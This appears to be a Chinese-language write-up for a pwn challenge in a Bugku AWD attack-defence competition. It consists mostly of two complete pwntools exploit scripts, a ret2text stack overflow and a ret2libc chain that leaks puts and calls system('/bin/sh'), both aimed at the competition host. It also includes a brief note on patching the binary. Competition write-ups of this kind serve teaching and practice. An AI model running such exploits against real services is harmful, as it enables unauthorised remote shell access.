Bugku S3 AWD排位赛-5 pwn

Bugku S3 AWD排位赛-5 pwn

栈溢出，直接ret2text

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('192-168-1-26.awd.bugku.cn', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shell = 0x4006CE
p1 = b'a' * (0x30 + 8) + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)

r.interactive()

修漏洞这里笔者直接把execve(“/bin/sh”, 0LL, 0LL);改成execve(0, 0LL, 0LL);，但转念一想，gets这个漏洞大部分人都不会修，所以笔者就直接写了第二份exp，也就是ret2libc

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('192-168-1-26.awd.bugku.cn', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)
'''
shell = 0x4006CE
p1 = b'a' * (0x30 + 8) + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)
'''

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']
pop_rdi_ret = 0x00000000004007b3

p1 = b'a' * (0x30 + 8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter('Please tell me your name: ', p1)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('puts_addr = ' + hex(puts_addr))
libc = ELF('../ppp/libc.so.6')
libc_base = puts_addr - libc.sym['puts']

bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
system_addr = libc_base + libc.sym['system']
ret = 0x000000000040053e
p2 = b'a' * (0x30 + 8) + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)
r.sendlineafter('Please tell me your name: ', p2)

r.interactive()

结果不出所料，有些队只会修execv，但是不会修gets，所以成功打到全场